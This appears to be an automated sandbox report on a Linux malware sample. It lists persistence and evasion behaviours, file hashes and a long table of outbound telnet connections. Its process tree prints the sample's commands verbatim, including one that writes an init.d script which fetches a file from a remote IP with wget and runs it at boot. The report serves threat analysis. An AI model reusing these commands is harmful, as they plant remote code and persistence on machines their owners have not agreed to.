Analysis Overview
SHA256
4bafa66638b4631077e617f850abdec293c5cde65cd12d247bca0c5b029e8357
Threat Level: Known bad
The file 20073737305.zip was found to be: Known bad.
Malicious Activity Summary
yara_template
File and Directory Permissions Modification
Modifies Watchdog functionality
Modifies init.d
Checks mountinfo of local process
Creates/modifies environment variables
Modifies rc script
Modifies systemd
Modifies Bash startup script
Changes its process name
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-25 09:15
Signatures
yara_template
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-25 09:15
Reported
2024-11-25 09:17
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
148s
Max time network
129s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /bin/chmod | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A |
Checks mountinfo of local process
| Description | Indicator | Process | Target |
| File opened for reading | /proc/1523/mountinfo | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A |
Creates/modifies environment variables
| Description | Indicator | Process | Target |
| File opened for modification | /etc/profile | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A |
Modifies init.d
| Description | Indicator | Process | Target |
| File opened for modification | /etc/init.d/system | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A |
| File opened for modification | /etc/init.d/sh | /bin/sh | N/A |
Modifies rc script
| Description | Indicator | Process | Target |
| File opened for modification | /etc/rc.local | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A |
Modifies systemd
| Description | Indicator | Process | Target |
| File opened for modification | /etc/systemd/system/custom.service | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A |
Modifies Bash startup script
| Description | Indicator | Process | Target |
| File opened for modification | /etc/profile | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/systemctl | N/A |
| File opened for reading | /proc/self/stat | /bin/systemctl | N/A |
| File opened for reading | /proc/cmdline | /bin/systemctl | N/A |
| File opened for reading | /proc/707/cmdline | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A |
| File opened for reading | /proc/self/status | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A |
| File opened for reading | /proc/1/cgroup | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A |
| File opened for reading | /proc/1/sched | /bin/systemctl | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/1530/status | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A |
| File opened for reading | /proc/1531/status | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A |
| File opened for reading | /proc/1/cmdline | /tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90 | N/A |
| File opened for reading | /proc/sys/kernel/osrelease | /bin/systemctl | N/A |
| File opened for reading | /proc/1/environ | /bin/systemctl | N/A |
Processes
/tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90
[/tmp/0eacebfc0fea73dbe895d481deb9258ac8b8ac9203cbc56cf90fdf6a9eb01e90]
/bin/sh
[sh -c systemctl enable custom.service >/dev/null 2>&1]
/bin/systemctl
[systemctl enable custom.service]
/bin/sh
[sh -c chmod +x /etc/init.d/system >/dev/null 2>&1]
/bin/chmod
[chmod +x /etc/init.d/system]
/bin/sh
[sh -c ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1]
/bin/ln
[ln -s /etc/init.d/system /etc/rcS.d/S99system]
/bin/sh
[sh -c echo "#!/bin/sh # /etc/init.d/sh case \"$1\" in start) echo 'Starting sh' /bin/sh & wget http://193.143.1.70/ -O /tmp/lol.sh chmod +x /tmp/lol.sh /tmp/lol.sh & ;; stop) echo 'Stopping sh' killall sh ;; restart) $0 stop $0 start ;; *) echo \"Usage: $0 {start|stop|restart}\" exit 1 ;; esac exit 0" > /etc/init.d/sh]
/bin/sh
[sh -c chmod +x /etc/init.d/sh >/dev/null 2>&1]
/bin/chmod
[chmod +x /etc/init.d/sh]
/bin/sh
[sh -c mkdir -p /etc/rc.d >/dev/null 2>&1]
/bin/mkdir
[mkdir -p /etc/rc.d]
/bin/sh
[sh -c ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1]
/bin/ln
[ln -s /etc/init.d/sh /etc/rc.d/S99sh]
Network
| Country | Destination | Domain | Proto |
| US | 154.216.19.139:199 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| RU | 193.143.1.70:38242 | tcp | |
| IN | 165.85.130.119:23 | tcp | |
| HK | 183.87.130.36:23 | tcp | |
| US | 144.187.70.108:23 | tcp | |
| US | 64.1.136.160:23 | tcp | |
| CA | 173.34.87.254:23 | tcp | |
| JP | 221.246.9.248:23 | tcp | |
| US | 51.54.237.153:23 | tcp | |
| US | 26.128.35.162:23 | tcp | |
| IN | 27.58.97.112:23 | tcp | |
| IN | 121.247.165.101:23 | tcp | |
| JP | 27.89.86.179:23 | tcp | |
| US | 55.89.48.116:23 | tcp | |
| US | 34.148.124.55:23 | tcp | |
| CN | 27.46.109.74:23 | tcp | |
| AU | 114.73.10.186:23 | tcp | |
| US | 159.54.226.85:23 | tcp | |
| US | 195.214.5.74:23 | tcp | |
| ES | 37.10.199.220:23 | tcp | |
| US | 8.116.19.66:23 | tcp | |
| PK | 39.43.190.127:23 | tcp | |
| AU | 49.182.69.60:23 | tcp | |
| BR | 177.217.83.163:23 | tcp | |
| US | 6.225.9.89:23 | tcp | |
| GU | 202.128.93.166:23 | tcp | |
| US | 162.150.101.3:23 | tcp | |
| TW | 210.68.65.225:23 | tcp | |
| US | 4.10.213.21:23 | tcp | |
| KR | 203.229.54.64:23 | tcp | |
| US | 206.110.55.56:23 | tcp | |
| US | 30.230.57.191:23 | tcp | |
| MQ | 109.62.125.240:23 | tcp | |
| DE | 94.135.51.105:23 | tcp | |
| RU | 176.108.177.120:23 | tcp | |
| US | 167.64.111.206:23 | tcp | |
| US | 11.10.42.42:23 | tcp | |
| GB | 109.68.70.184:23 | tcp | |
| ES | 77.224.205.245:23 | tcp | |
| PT | 78.130.118.180:23 | tcp | |
| US | 67.86.215.12:23 | tcp | |
| MX | 189.242.254.126:23 | tcp | |
| NO | 81.29.45.78:23 | tcp | |
| US | 76.207.175.197:23 | tcp | |
| DE | 37.85.78.90:23 | tcp | |
| AR | 200.61.177.202:23 | tcp | |
| CN | 27.159.57.177:23 | tcp | |
| CN | 183.167.203.99:23 | tcp | |
| US | 128.202.190.89:23 | tcp | |
| CN | 106.85.212.86:23 | tcp | |
| PL | 79.175.255.236:23 | tcp | |
| US | 72.195.51.20:23 | tcp | |
| CN | 60.17.2.101:23 | tcp | |
| CA | 70.70.174.153:23 | tcp | |
| US | 148.175.228.174:23 | tcp | |
| US | 169.181.66.5:23 | tcp | |
| CN | 223.213.231.57:23 | tcp | |
| CN | 120.217.35.79:23 | tcp | |
| BR | 189.114.189.74:23 | tcp | |
| DE | 84.150.145.169:23 | tcp | |
| CN | 202.189.52.86:23 | tcp | |
| IT | 131.154.194.44:23 | tcp | |
| US | 108.148.96.179:23 | tcp | |
| ZM | 165.56.83.232:23 | tcp | |
| AU | 101.180.197.247:23 | tcp | |
| DE | 80.226.119.205:23 | tcp | |
| US | 173.233.165.119:23 | tcp | |
| US | 47.147.207.77:23 | tcp | |
| BR | 181.232.213.40:23 | tcp | |
| US | 54.70.64.242:23 | tcp | |
| US | 96.10.115.202:23 | tcp | |
| IE | 87.198.135.243:23 | tcp | |
| FR | 109.9.157.47:23 | tcp | |
| CN | 114.84.210.205:23 | tcp | |
| US | 30.125.152.170:23 | tcp | |
| US | 174.24.121.9:23 | tcp | |
| US | 131.189.38.75:23 | tcp | |
| US | 199.6.167.95:23 | tcp | |
| US | 215.106.181.81:23 | tcp | |
| BE | 164.15.198.156:23 | tcp | |
| TW | 42.66.205.217:23 | tcp | |
| BR | 200.19.72.111:23 | tcp | |
| JP | 60.84.43.199:23 | tcp | |
| DE | 178.15.107.152:23 | tcp | |
| IE | 52.19.119.59:23 | tcp | |
| NL | 192.136.51.51:23 | tcp | |
| US | 69.141.229.128:23 | tcp | |
| KZ | 95.58.21.169:23 | tcp | |
| US | 136.94.154.64:23 | tcp | |
| PT | 82.155.79.210:23 | tcp | |
| US | 209.156.130.79:23 | tcp | |
| JP | 133.7.235.163:23 | tcp | |
| US | 67.0.11.89:23 | tcp | |
| GB | 25.130.235.69:23 | tcp | |
| CN | 42.168.168.21:23 | tcp | |
| US | 214.164.123.190:23 | tcp | |
| NL | 185.138.240.52:23 | tcp | |
| TH | 180.128.209.43:23 | tcp | |
| US | 205.80.60.11:23 | tcp | |
| SI | 86.61.40.105:23 | tcp | |
| US | 108.201.129.213:23 | tcp | |
| US | 34.49.158.53:23 | tcp | |
| AU | 123.3.118.6:23 | tcp | |
| US | 166.237.20.190:23 | tcp | |
| MY | 42.188.251.158:23 | tcp | |
| JP | 211.8.14.88:23 | tcp | |
| CN | 124.16.238.206:23 | tcp | |
| US | 165.119.224.21:23 | tcp | |
| US | 98.20.185.251:23 | tcp | |
| US | 204.110.160.4:23 | tcp | |
| PK | 182.179.194.178:23 | tcp | |
| US | 194.133.227.169:23 | tcp | |
| BR | 179.243.22.188:23 | tcp | |
| US | 7.198.122.148:23 | tcp | |
| US | 23.204.48.159:23 | tcp | |
| US | 129.101.163.26:23 | tcp | |
| MU | 105.20.173.115:23 | tcp | |
| US | 6.94.74.191:23 | tcp | |
| US | 3.48.7.13:23 | tcp | |
| CN | 114.94.28.207:23 | tcp | |
| GB | 194.82.230.237:23 | tcp | |
| IE | 193.120.67.74:23 | tcp | |
| US | 139.70.1.99:23 | tcp | |
| US | 44.227.237.235:23 | tcp | |
| BR | 177.100.201.109:23 | tcp | |
| CN | 123.65.142.23:23 | tcp | |
| US | 138.35.169.0:23 | tcp | |
| US | 172.119.40.87:23 | tcp | |
| KR | 112.178.112.227:23 | tcp | |
| CN | 122.81.83.150:23 | tcp | |
| DZ | 105.104.141.172:23 | tcp | |
| US | 100.169.44.250:23 | tcp | |
| TW | 61.231.197.131:23 | tcp | |
| US | 24.239.94.182:23 | tcp | |
| US | 67.217.208.133:23 | tcp | |
| US | 173.242.165.125:23 | tcp | |
| US | 143.141.216.11:23 | tcp | |
| US | 35.252.19.10:23 | tcp | |
| GB | 193.30.27.210:23 | tcp | |
| CA | 192.95.141.194:23 | tcp | |
| GB | 193.56.176.133:23 | tcp | |
| US | 54.202.114.177:23 | tcp | |
| AU | 103.70.234.174:23 | tcp | |
| US | 192.69.215.85:23 | tcp | |
| US | 214.134.20.60:23 | tcp | |
| AR | 181.119.118.3:23 | tcp | |
| US | 44.103.124.4:23 | tcp | |
| US | 184.45.62.92:23 | tcp | |
| UG | 102.34.152.112:23 | tcp | |
| CN | 49.95.202.196:23 | tcp | |
| US | 65.245.217.109:23 | tcp | |
| JP | 60.149.255.227:23 | tcp | |
| AU | 124.177.5.112:23 | tcp | |
| SA | 180.234.114.78:23 | tcp | |
| CA | 199.243.210.238:23 | tcp | |
| DE | 151.189.179.26:23 | tcp | |
| FR | 103.133.84.206:23 | tcp | |
| PH | 210.213.149.206:23 | tcp | |
| CN | 27.198.93.85:23 | tcp | |
| US | 21.226.1.187:23 | tcp | |
| CA | 72.0.217.166:23 | tcp | |
| CN | 202.104.113.50:23 | tcp | |
| US | 164.223.235.16:23 | tcp | |
| KR | 14.69.184.245:23 | tcp | |
| US | 52.39.63.186:23 | tcp | |
| US | 96.227.190.177:23 | tcp | |
| IT | 81.121.195.155:23 | tcp | |
| US | 207.92.108.74:23 | tcp | |
| IT | 93.145.61.243:23 | tcp | |
| US | 72.210.255.133:23 | tcp | |
| US | 74.204.18.52:23 | tcp | |
| US | 16.13.75.140:23 | tcp | |
| CN | 112.195.236.70:23 | tcp | |
| ES | 95.63.198.136:23 | tcp | |
| CN | 112.241.196.138:23 | tcp | |
| US | 44.102.21.199:23 | tcp | |
| US | 75.243.240.94:23 | tcp | |
| CH | 134.21.102.228:23 | tcp | |
| RU | 94.77.69.125:23 | tcp | |
| US | 173.170.50.122:23 | tcp | |
| FR | 86.192.112.215:23 | tcp | |
| US | 206.245.47.107:23 | tcp | |
| US | 96.173.19.57:23 | tcp | |
| US | 129.38.4.191:23 | tcp | |
| VN | 14.162.124.138:23 | tcp | |
| CN | 61.163.205.239:23 | tcp | |
| CN | 171.105.244.199:23 | tcp | |
| DE | 130.185.125.83:23 | tcp | |
| BR | 177.34.76.31:23 | tcp | |
| US | 137.181.205.104:23 | tcp | |
| SG | 172.188.154.56:23 | tcp | |
| US | 7.13.32.22:23 | tcp | |
| KR | 112.191.199.75:23 | tcp | |
| US | 215.188.49.185:23 | tcp | |
| AE | 92.98.37.31:23 | tcp | |
| IL | 45.12.81.197:23 | tcp | |
| ZA | 164.151.240.190:23 | tcp | |
| FR | 46.193.57.25:23 | tcp | |
| US | 174.199.206.176:23 | tcp | |
| FR | 162.38.159.37:23 | tcp | |
| US | 208.152.177.93:23 | tcp | |
| US | 154.63.60.10:23 | tcp | |
| US | 154.216.19.139:199 | tcp | |
| US | 154.216.19.139:199 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| GB | 89.187.167.7:443 | tcp | |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 84.17.50.9:443 | 1527653184.rsc.cdn77.org | tcp |
Files
/etc/systemd/system/custom.service
| MD5 | 19a440fdac7f578f2fb33719698a082c |
| SHA1 | ebadce21c65d05ad62a324deb39c57aecd3edf2c |
| SHA256 | b176d41b748466f8ba35246c78a1c940f65403b363c086ccd5b5de577a87cf69 |
| SHA512 | 8bdfac90e7235fc35eeec141a1e2145ed4ea5a250b71bdf0cf0e5e5aa59ab6dc004dc08561bd5547c4a4a106138c98950dc2098c905ce785b9b2c0657684d7bb |
/etc/inittab
| MD5 | 3d6b6e1b05ad5d0538ccd8804bcd279b |
| SHA1 | 0fc061b51c225d5bea072c939de05e8a856558bc |
| SHA256 | cab2df9c1c498df29445837610f14ae08d4af98d3acac69b0581c01fe594e3c5 |
| SHA512 | 1957857cffbc0d526eb04e40db166d661b9dc59fc31fb5551f31cd58d270f839ffa2098e81c8555b12e9dbd55ba17df662b14c6441a6389eb9a76082fa401c98 |
/boot/bootcmd
| MD5 | 735cae7d3cbab0f59d95f84790282103 |
| SHA1 | 1cb77931b3097f18988016c9ceba3280a5ccb2ae |
| SHA256 | dfdd4cf729384e4ed52516ab72bd86be286c80f53d4f5b764fd2dd2a2b2c983b |
| SHA512 | 998daa467c4ee63dd41515897728de70cbb9c579ca8b16c26d8e6db5edad53c6dbd6343fb10eda3dbc29b0cb1fa72a9b2653250e9027e6ee02d17726e958bbfe |
/etc/init.d/system
| MD5 | f000251d92c773cc3ee1ca22cf5f0788 |
| SHA1 | e2386fe6a5f29b1e9e5ad5b38928c024f97105e6 |
| SHA256 | 31a77745dd3724a0691a9255738b9c87516868932e3eb992e2afafcd0574a985 |
| SHA512 | 0dad5adaa7742dd208596fefad53ab21c39fbf2cbe5c9958b92170d555d316f0a0b02ec5236311b869aa18e90592e81439a3a229bf1307b5daf87d87c5f493c2 |
/etc/init.d/sh
| MD5 | c5583b6a699f62cb0a004c99842f5c70 |
| SHA1 | b232ef89bf9b36643b5956aaacfd295b9ce2a0a7 |
| SHA256 | 2b03c83558e4af71f3b35408cf668a2ee06931c21adec760952a21a11bc4c59b |
| SHA512 | a9fc1e4c30452a3d100a8ccfbb707d9d323830fbbca90c98d3c126bf943539baaf1fccb04d435a4b627ed7f1bfb1bbd649dab282488d951dde87e097423e154d |
/etc/motd
| MD5 | 2bd9b4be30579e633fc0191aa93df486 |
| SHA1 | 7d63a9bd9662e86666b27c1b50db8e7370c624ff |
| SHA256 | 64dc39f3004dc93c9fc4f1467b4807f2d8e3eb0bfa96b15c19cd8e7d6fa77a1d |
| SHA512 | ae6dd7b39191354cf43cf65e517460d7d4c61b8f5c08e33e6ca3c451dc7cab4de89f33934c89396b80f1aade0a4e2571bd5ae8b76ef80b737d4588703d2814d5 |